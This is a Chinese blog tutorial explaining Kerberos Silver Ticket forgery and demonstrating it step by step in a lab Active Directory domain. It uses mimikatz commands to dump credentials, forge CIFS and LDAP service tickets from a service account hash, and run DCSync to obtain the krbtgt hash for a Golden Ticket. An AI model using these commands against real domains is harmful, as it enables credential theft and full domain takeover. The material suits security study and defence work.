白银票据的原理和使用

最新推荐文章于 2024-04-28 22:04:09 发布
最新推荐文章于 2024-04-28 22:04:09 发布
阅读量1k 收藏 1
点赞数 1
分类专栏: 渗透 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45455136/article/details/128384899
版权

白银票据的原理和使用

服务账号是计算机名字+$用来管理服务的账号

白银票据(Silver Ticket)原理

白银票据是伪造本该由TGS返回的ST(服务票据),从而访问对应的服务

  • 有server用户的hash就可以伪造出ST,且不经过KDC,但伪造的票只对部分服务起作用,权限比黄金票据低

白银票据的使用

  1. 控制了DC域控和域内主机WIN7
    在这里插入图片描述

  2. 从域控获取基本信息
    获取域名称
    在这里插入图片描述
    获取域SID值(末尾500代表是管理员)
    在这里插入图片描述
    获取服务账号的NTLM Hash
    mimikatz sekurlsa::logonpasswords
    在这里插入图片描述

  3. 域控下线,在WIN7伪造服务票据
    此时WIN7无访问域控c盘权限
    在这里插入图片描述
    查看已有票据:mimikatz kerberos::list 或 powershell klist
    在这里插入图片描述
    清除已有票据:mimikatz kerberos::purge 或 powershell klist purge
    在这里插入图片描述
    伪造cifs服务票据:mimikatz kerberos::golden /domain:hack.com /sid:S-1-5-21-281111118-1086056466-1450022951 /target:dc.hack.com /service:cifs /rc4:0e2fb6d70a6b2a0f4521bea5d91e399b /user:aaa /ptt
    在这里插入图片描述

  4. 访问域控c盘,只有访问目录权限
    在这里插入图片描述
    尝试获取krbtgt的NTLM Hash,获取失败,需要有ldap服务的票据
    mimikatz lsadump::dcsync /dc:dc.hack.com /domain:hack.com /user:krbtgt
    在这里插入图片描述

  5. WIN7伪造LDAP共享服务票据
    mimikatz kerberos::golden /domain:hack.com /sid:S-1-5-21-281111118-1086056466-1450022951 /target:dc.hack.com /service:LDAP /rc4:0e2fb6d70a6b2a0f4521bea5d91e399b /user:aaa /ptt
    在这里插入图片描述
    再次执行mimikatz获取Hash命令,成功得到krbtgt的NTLM Hash
    在这里插入图片描述
    即可制作黄金票据
    在这里插入图片描述

c1o22
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
域权限维持(黄金票据白银票据)
qq_18811919的博客
03-19 1892
黄金票据白银票据通常被认为属于票据传递攻击(Pass-the-Ticket,简称PTT)的一种。 这是一种针对Windows身份验证系统的攻击,攻击者可以利用缺陷或弱点获取用户或系统 帐户的票据信息,然后将其用于进一步攻击或访问敏感资源本篇文章注意讲述了黄金票据白银票据的数据包分析以及如何进行PTT攻击,讲述了多种利用方式包括CS/mimikatz/Impacket等。
黄金票据白银票据详解
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
06-22 4951
在 Windows 系统中,存在许多突破用户权限或绕过系统保护机制的漏洞,攻击者可以通过利用这些漏洞,提升自己的权限并获取黄金票据。​ Golden Ticket是通过伪造的TGT(由身份认证服务授予的票据,用于身份认证,存储在内存,默认有效期为10小时),因为只要有了高权限的TGT,那么就可以发送给TGS(票据授予服务)换取任意服务的ST。​ 每个用户的Ticket都是由krbtgt的密码Hash来生成的,那么,我们如果拿到了krbtgt的密码Hash,其实就可以伪造任意用户的TICKET,
黄金票据白银票据
最新发布
weixin_53639243的博客
04-28 890
黄金票据就是伪造了Kerberos协议中的身份票据(TGT)黄金票据可以访问该用户身份的所有服务白银票据就是伪造了Kerberos协议通信流程中服务票据(SGT)白银票据只能访问某一个服务使用域管理员身份创建的票据就是黄金票据,可以访问域内的所有服务。
白银票据及黄金票据的一些学习
dayouzi的博客
08-11 591
Golden Ticket(金票)是通过伪造TGT(TickerGranting Ticket),因为只要有了高权限的TGT,那么就可以发送给TGS换取任意服务的ST。可以说有了金票就有了域内的最高权限。对于攻击者来说,只要拿到了域控权限,就可以直接导出krbtgt的Hash值,再通过mimikatz即可生成任意用户任何权限的Ticket,也就是Golden Ticket。
一文搞懂黄金白银票据
m0_75218183的博客
06-29 841
在学习黄金白银票据之前,我们先要搞懂Kerberos(三头保卫神犬)协议。Kerberos 是一种网络认证协议,其设计目标是通过密钥系统为客户机 / 服务器应用程序提供强大的认证服务。该认证过程的实现不依赖于主机操作系统的认证,无需基于主机地址的信任,不要求网络上所有主机的物理安全,并假定网络上传送的数据包可以被任意地读取、修改和插入数据。在以上情况下, Kerberos 作为一种可信任的第三方认证服务,是通过传统的密码技术(如:共享密钥)执行认证服务的。
权限维持-白银票据
m0_64815693的博客
06-04 274
权限维持-白银票据
内网渗透——黄金票据白银票据
来日可期的博客
10-11 2460
黄金票据(Golden Ticket):黄金票据指的是攻击者通过获取目标环境中域控制器(Domain Controller)上的krbtgt帐户的散列值,然后使用散列值生成伪造的票据。这种伪造的票据具有极高的权限,并且不受密码更改的影响。拥有黄金票据相当于拥有域内的最高权限,攻击者可以访问和控制所有域内资源。 白银票据(Silver Ticket):白银票据是攻击者通过获取目标环境中某个服务帐户(Service Account)的散列值,并使用散列值生成伪造的票据。这种伪造的票据允许攻击者模拟该服务账户的
域渗透之黄金票据白银票据
dys的博客
07-19 493
黄金票据白银票据 kerberos协议
白银套利交易原理.pdf
09-30
白银套利交易原理.pdf
白银分析软件使用教程以及技术分析入门
12-08
白银分析软件使用教程以及技术分析入门,入门级
各类数据对白银的影响.doc
12-06
各类数据对白银的影响.doc
白银基础简介和开户流程.pptx
10-06
白银基础简介和开户流程.pptx
2022年白银市建筑轮廓GIS数据
06-08
2022年白银市建筑轮廓GIS数据
解析:Kerberos、黄金票据白银票据
Sgirll的博客
07-15 739
是指攻击者获取了合法用户的TGT(Ticket Granting Ticket)的信息,然后对TGT进行篡改以生成伪造的服务票据(TGS票据)。白银票据伪装成合法的TGS票据,用于访问特定的服务,但与黄金票据不同,白银票据只能访问被篡改的服务,无法获得对整个域的完全控制。服务访问:用户使用TGS票据向目标服务发送请求,目标服务使用TGS的私有秘钥解密票据并验证用户的身份。服务票据的颁发:TGS验证TGT,并为用户生成一个服务票据(TGS票据),该票据包含有关用户和目标服务的信息,并用TGS的私有秘钥加密。
黄金票据&&白银票据
huohaowen的博客
02-20 518
今天来讲讲黄金票据&&白银票据
域权限维持-黄金/白银票据详解
good good study
04-19 1968
在域环境中进行权限维持,谈的比较多的便是票据,分为白银票据和黄金票据, 其原理都是基于Kerberos认证。黄金票据伪造的是域管下发给用户的TGT,而白银票据则是伪造的 ST。
白银票据原理制作与利用
G3et的博客
01-19 282
1、如果是域普通用户,主要看防火墙,开了防火墙可能会导致dir过不去2、白银票据伪造的是ST,只能访问特定的服务,如cifs(文件共享服务)、winrm(远程管理)3、白银票据获取的是服务的hash4、白银票据不通过kdc,相对黄金票据银票更加隐蔽。
Kerberos协议分析及域服务器配置以及黄金白银票据攻击复现
nopants的博客
06-16 962
域服务器搭建以及用户加入域服务器及黄金白银票据攻击的验证复现
内网渗透:三、Kerberos协议及票据(黄金和白银)伪造
liu_jia_liang的博客
02-20 3427
一、Kerberos协议 kerberos(Secure network authentication system)中文叫网络安全认证系统 kerberos在进行认证过程中并不会传输用户的密码,而是通过传输tickets(票据)进行认证登陆到LDAP server。Kerberos协议主要用于计算机网络的身份鉴别,其特点是用户只需输入一次身份验证信息就可以凭借此验证获得的凭证(ticket-granting-ticket)访问多个服务,即SSO(Single Sign On)。由于在每个Client和S
内网中黄金票据白银票据的区别
05-14
在内网中,黄金票据白银票据通常是指两种不同的身份验证方式。 黄金票据是指一个用于身份验证的加密令牌,它被称为黄金是因为它具有最高的权限级别。黄金票据可以让用户在网络中获得管理员级别的访问权限,因此它的使用应该被高度限制并受到严格的监管。 白银票据则是一个用于身份验证的较低级别的加密令牌。它通常被用于授权用户在网络中执行一些普通的任务,例如打印文件或者访问共享文件夹。白银票据通常具有比黄金票据更低的访问权限,因此它的使用范围更广,可以被更多的用户所使用。 总的来说,黄金票据白银票据都是用于身份验证的加密令牌,它们的主要区别在于权限级别的高低。在内网中,这些票据使用应该受到高度的限制和监管,以确保网络的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值